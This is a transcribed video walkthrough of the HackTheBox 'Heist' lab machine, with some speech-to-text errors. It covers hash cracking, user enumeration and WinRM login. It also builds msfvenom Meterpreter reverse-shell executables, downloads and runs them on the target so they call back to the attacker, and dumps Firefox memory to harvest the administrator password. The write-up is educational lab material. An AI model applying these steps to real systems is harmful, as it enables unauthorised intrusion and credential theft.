Hello and welcome guys. In this tutorial video we'll be looking at the HackTheBox machine called Heist. Quite a very easy box but also very interesting. So a quick review on the box. We find some credentials to log in via Windows Remote Management. So we find a user who is also able to log in through WinRM. We log in through WinRM, we do some enumeration to find out Firefox is running on the box. We dump the Firefox service and analyze the dump in order to extract the administrator's password, which was used to log into a web application. So let's jump in. So the first thing to do is do an nmap scan. So nmap sc-sv 10.10.10.149 and pass that to a file called scan. So in my initial enumeration, we can see we've got an HTTP service running on port 80. We also got SMB on 135 and 445. So I proceeded to do a full scan as well. So in order to do that, you could simply run nmap-p- the IP address of the target .149, and I just piped that into a file called full, and a full enumeration of the services. We could see port 80, 135, 445, and then we also see 5985 open WSMan, and this port is actually what runs the WinRM or the Windows Remote Management Service, which we are going to exploit. So the first thing I did was to go onto the web application, check out what's running. And we get this support login page. I tried stuff like admin at heist.htb and just a password, trying to log in. We get credentials invalid. Then I try to log in as guest, and here we see some issues have been raised by a user called Hazard, and he's complaining about problems logging into a Cisco router using the configuration. And the admin response is saying, thanks for posting the issue here. We provide fast support and help. Let me take a look and get back to you. So what I did was to click on this attachment, and here we see some information regarding the password or username used to log into the Cisco router. So my first thought was, let's try to see if we could crack this password. So the first thing I did was to go to hashcat. So you can do hashcat example hashes. Okay, and the password appears to be dollar, starting with $1. So we could just do a Control F and just try to search for that hash. And straight away we see here, it says it's an MD5 Cisco iOS and Unix sort of hash. So you can see the number, the hash mode here is 500. So the next thing I did was to start up hashcat. So we could do that by going back here. We could just do nano creds.hashes, paste in the hash. And then we start hashcat. And we could do hashcash -- help. And we see straight away this is the syntax we need to use. So you could do hashcat -a 0-the hash mode 500. We supply the hash file and a dictionary list. So just went for rockq.ext. So user share word lists rawq.txt, and then we use the force parameter. So sending this away, it says all hashes already in the port file, and that's because I've already done this before, because it did take some time to actually crack this hash. So we can have a look by going to this directory, hashcat hashcat.port file, and we can see the password after cracking it is called Stilt1Agent. So I'm just going to copy this password, save it here. So the next thing I tried to do was to, if we go back to our scan, so cat full, remember the WinRM service. So I said, right, probably we could log in with this into this WinRM service and be able to get a shell on the box. So the first thing I did was to do some Google search, and I found a very interesting shell script we could use, a Ruby script. So if I go to my bookmarks, I've got it there, and we could get a WinRM shell using this. So I'm just going to copy these out. WinRM.ruby, paste that in here, and here we could edit the username and password, and also this. So we'll come back to this in a bit. The next thing is to, if we go back to the configuration file we found, we could see a couple of more password and usernames. So we've got a user called router, a user called admin, and we've also got what appears to be a hash, but this hash is actually a Cisco type called password 7. So after a lot of enumeration, I found a page where I could actually decrypt the password. So the first one, I just copied it here, so you can see type 7 password, because type 7 is what this password also says, so password 7. So we go in here, crack password, we get the password in plain text. I'm just going to add that to this. And then the other one, copy that here, go in here, paste it in, crack the password, and we get a plain text. So we've got 3 passwords to use. We've also got some couple of usernames. So the first thing I did was to try this first one in our Ruby script. So what I did was to use the user called Hazard, and that's the user that opened an issue on the configuration page. Supply the password. The IP address of the Heist machine is 10.10.10.149. Save the script. Run the script. Ruby. We appear to get a shell, but if we run dir, he hangs up on us, and it doesn't really tell us the credentials are wrong, but this behavior suggests the credentials we found was wrong. So we get no response, and you can see it tells us a lot of errors, and these errors are just suggesting that the username and password is probably wrong. So the next thing I did was to, because if we go back to the scan, we could see SMB service running 135.445. So I just used the in-package script called lookups SID.py, and then if we do this and do help, you can see in order to run this, we could run the domain name, username, password, and then at the target IP address. So what I did in this instance was to do this. We got the domain, so I just use heist.htb. slash the username. I use Hazard as the username. Password is the Stealth 1 agent. Paste that in here at 10.10.10.149. We run this, and straight away it tries to enumerate SIDs, and then it gives us a lot of usernames on the box. So we can see users, called administrator, guest, default account, WDA, utility, none, hazard, support, chase, and JSON. So what I did was to copy all these usernames and then try them out on the WinRM using the set of credentials we also found. So if we go back to a script, the one that actually worked is the user called Chase, and the password that was successful was the one below. So we run the script, we get a shell, do dir, nothing, do ls, who am I? And we can see we got a shell on the box because it tells us we are support desk to Chase. So if I do a pwd, it tells me an actual called this directory. So we can do cd -- dir. We go to the desktop folder, cd desktop, dir, and we could get the user flag. So if you just do get user or type user.txt, we should be able to display the flag. So the next thing I then did was to enumerate processes running on this box. So we could do ps to see if we could enumerate services. So we see loads of services running in the box, and we can see Firefox is one of them. So I decided to dump the Firefox. So I actually got help from people on the platform on how to do, on the platforms, because I tried enumerating and I was giving some hints that, just dump a process that you might find sort of strange. So I said, okay, maybe the Firefox one will probably give some results. So the tool to use is called ProcDump. So you could do ProcDump and SysInternals ProcDump. And we could download this. So download ProcDump. So save file. Okay, so we got that in our directory. So show ProcDump. So I could open the directory here. So I'm just going to copy this, go to home, and then my HackTheBox directory, if I can find it here, then go on to Heist, paste it there, probably rename that, just call it ProcDump. Okay, so we got that in our directory. However, if we go into this directory again, and try to unzip this file, so open Reactive Manager, we see we've got ProcDump exe, which is a 32-bit, and then we've got the ProcDump 64 exe. So I'm just going to extract this into the location. So we've got both files extracted, ProcDump 64-bit and 32. So going back to this box, I tried enumerating for the to find out the architecture of the box. So we could do system info, and then we realize we get an access denied. So my next thought was to see if we could get an interpreter shell, and probably from interpreter we might be able to find out the service that is running. So a very good resource I normally use is called executable payloads. So click on this other link. I'm just going to copy this exe using MSF Venom. So we can do cd HackTheBox, cd Heist, and then paste this in. So the first thing I did was to say, right, let's try 64-bit one. If that works, if it doesn't, then we try 32-bit. If that doesn't work, then we try 64-bit. So I'm just going to open a port to port 4444, find out what my IP address is. If config .0, get my IP address here. Paste that there, and I'm going to call this chase 32. So we're going to generate a payload, try to get an interpreter shell. Whichever works is going to be fine. Then I'm going to create another one. And this time around, that's going to be an x64. So x64 interpreter. I'm sure there might be a better way to do this, but 64, and make the port 443 this time around for the 64-bit one. So we've got two exploits. Or two exploits to run on the box to get an interpreter shell. So meanwhile, while that is going on, go to start MSF DB. So we get an MSF1. I'm going to open up another one and do the same thing. So MSF DB run. So we get two interpreter. So always on top there. So what we can do now is to use exploit /multi/handler. My spelling there is wrong, so it should be handler. And then we could set payload. So set payload to the first one, which is the 32-bit interpreter. So set payload to that. Set lhost to tom0. And now we could do options. We see that we've got tom0 and we've got port 444, which is the same listening port which was set here. So I'm just going to do run. And then on the other one, we're going to use exploit /multi/handler. And then we set our payload this time around to the 64-bit interpreter. Got that wrong. Set payload Windows 64. Okay, and set lhost tom0. Set lport to 443. We do run, and now we could set up a Python web server. So simple HTTP server port 80, and then we could use the invoke web request -URI, specify the IP address, HTTP 10.10.14.172. I believe we download chase.32.exe. Then we specify the out file. So just going to minimize this. If we go back, we're actually in this directory here. So specify the out file to go into this directory, and we call that chase32.exe. Let's see. So got our web server running there. I'll try to get the file. Yeah, so we get 200 OK. That was successful. And then we download the 64 as well. So we got 64.exe. We have to change this to 64. So 64.exe. And then they copy the out file to the desktop. So we've got chase64.exe. And then we download this file as well. We get a 200 OK. And then we can use the start process command to start the chase32.exe. And then also start process chase64.exe. Okay, so if we go now, we should have an interpreter shell. So we have an interpreter shell. Maybe we should have two. Just going to minimize all of this. So we have two interpreter shells. So both of the exploit work. So I could just do a system info to confirm, or is a sysinfo. Yeah, and we can see the architecture is actually a 64-bit Windows 2016 operating system. However, our interpreter is an 86 Windows here. We could do the same here to say sysinfo. And here we can see our interpreter is actually a 64 Windows interpreter. So that tells us this is the architecture of the box. So in that case, if we then use the ProcDump, so I'm just going to end this. So we could get the 64-bit ProcDump. So let's go back to ProcDump. So in order to run ProcDump, we have to say, so write a full dump of a process with PID 4572. So I think I'm going to exit this. I'm going to set payload I'm going to set L port to 443. Then set the payload back to the 64 one. So I should have ended the 64, or I should have ended the 32 and not the 64. So 64 on there. Run. Let's run our start process 64 again. Okay, so I think we got a shell. Okay, so we got a shell on here on success session. So if we do sysinfo, we can confirm we have a 64-bit 64 payload, and also we are on the box. So now we could go on to download the ProcDump 64-bit. So if we go back in here, we've got the ProcDump 64.exe. So that's the one we're going to download. So we'll do ProcDump 64.exe. Then we specify the out file. So here, and we could call that ProcDump 64.exe. I'm sure a 32-bit one will also work, because you could run a 32-bit binary on a 64-bit machine. However, just to make sure it works, I'm going to invoke that. So we got that, and then we can then run the command. So the command is to find out, write a full dump of a process with PID 444. So we do procdump-ma and then a process ID. So if we do get process, to look for the Firefox one. So this is the ID number. The ID number here. So if we go for Firefox, we could just pick one of these. So I'm going to pick 7132, and then I'm going to run that binary. So I'm going to say start process procdump 64-ma, and then give it the procdump 64.exe-ma, and then the IDs. Let's see what happens. So it's saying we can't do that. So let's see if this just actually works. If we run it this way, procdump 64. Right, what we can do is, I think I'd rather do it from interpreter. So if we drop into a shell in the interpreter here, we have a proper shell. So we're on the desktop, so we can just run this rather than running it this way. So we can do this from the interpreter shell. So let's run it from here. Okay. So it says ProcDump utility system internals, blah, blah, blah. You may install this and stuff. So let's see how this works. So let's run this one more time, see what happens. So I think we need to accept the agreement before we could actually run this. So let's see, how do we actually then get to accept the terms and conditions? So let's do another Google search. So we could do ProcDump accept so Control F, accept. So use the acceptable command line to options to accept the system user. Okay, so we could do this, accept. So it says here we should just use this to accept the terms and conditions. So let's run that first. I think that looks fine. And then we use this command now to dump the process. And fingers crossed that should work. There we go. So it's writing this dump into here. So if we do, so this is the stuff we need to. So it's written the dump, and it's called this Firefox exe that. So now if we exit, we go back to an interpreter shell, and then we could download root HackTheBox Heist, and then just give it the name of the file. So we can download this file, see what happens. Operation fail for the file specified. So let's run that command again. I think you have to put in double slashes. There we go. So we're downloading the file that we just dumped. And once the download is complete, we should then be able to analyze the dump to see if we could extract the credentials. So it's a very big file, because if you see it's saying 286 MB, and we're still in 25 megabytes at the moment. So it's going to take a while for this to actually complete, for us to see what's inside. So what I could do is, let's exit this. Do a list, and we can see this is the file. Okay, so if we do file, or we do ls-l on this file to see the size of it, and we can see what the file is. So while it's still running, I'm just going to run strings on this. Hopefully we might find the credit inside. If not, and we can see strings running on there. So I'm just going to cancel that. So I'm going to do strings, and now I'm going to grep administrator. And you can see, do we have anything that has to do with credentials yet? I don't see anything that looks like the credentials. So let's go back to our download. So it says error timed out, session died. So we lost the session on the box. Okay, so let's do that again. Let's remove the file. Go back to run our WinRM. pwd cd -- cd desktop dir. Still have our files there. So we can see here, this one's ended with 535.dmp. So we've got ProcDump, we've got all of that in there. So I'm just going to run this again to get our interpreter shell. So start process 64 that. Go back in here and run. Should get our interpreter shell. We do. Should drop us into a shell. Okay, there we go. Do pwd, run this desktop, do dir. We could see the initial process here. So we could just drop into the shell. So do shell. So we could delete the file. Okay, now we could go back and run this ProcDump. But before that, let's see if the process ID hasn't changed. So we could do get process. So we see the Firefox. I think I'm going to go for let's go for this 1620. So we could do proc dump 64.exe -ma. Paste that here. So we've got the file. And then we exit this. We do download this file. Just going to find the specified part. Everything seems right. Download C users chase or desktop. So 2 slashes for desktop. And then we're downloading the file. So once this completes, to save time, I'm just going to open a different directory where I've done this before. So cd atb, cd heist, so I did this before when I dumped the credentials, and I'm just going to show you how I got the password. So I'm just going to grep administrator because I just want to save time. Don't actually see it here. That's just strings the whole without grepping. So it is a very big dump. So I'm just going to scroll, and I think it was somewhere at the beginning of the dump. Grep login. Don't find login. Password. Grep login. I'm a bit clumsy doing this video tonight. And there we go. So scrolling through all the junk in this mess. Right, so let's try this one more time. Say username. Maybe that's going to be much easier. A lot of stuff coming up. Somewhere in here we should find the username and password for the admin user. I'm sure there should be an easier way to do this. However, it's kind of tedious to find the username and password from all of these data here. Okay, so what I'm going to do is to save time is to grep, let's grep login dot php. So strings not found, strings, be clumsy tonight, but we should get there. And there we go. Here is where we find the username, admin support, and this is the password. So we can see the password being used to log in. It's just this here. So you can see username, admin, support, and then the password. So going back to our WinRM script. So this download is still going a long time, and that's why, because I've done this before, it's quite easier to to do this. So I'm just going to exit this. Nano, go back in here. Nano WinRM Ruby. Change the username to administrator. Put in the password that we recovered in there. Run the script. dir. And then we see we've got a shell. So if I do who am I am administrator, pwd. I'm actually in here, so we can do dd dot cd desktop. dir cd dot dir. So we do desktop. And there we go, that's the root flag. So we could do type root.txt, and we should be able to print out the root flag. So apologies for being a bit clumsy in this video. However, that's how I did it. There might be some other easier ways to do it. So dumping the Firefox process running, looking through the mess and trying to grep for password, login, support. And I believe this is the username and password being used to log in to that page we found by the initial sign-in page we found. So this is an admin logging into a compromised box using the username and password, which is the same username and password that could be used to authenticate to Windows Remote Management. So that is the box, guys. Thanks for watching, and I shall see you some other time. Cheers and thank you.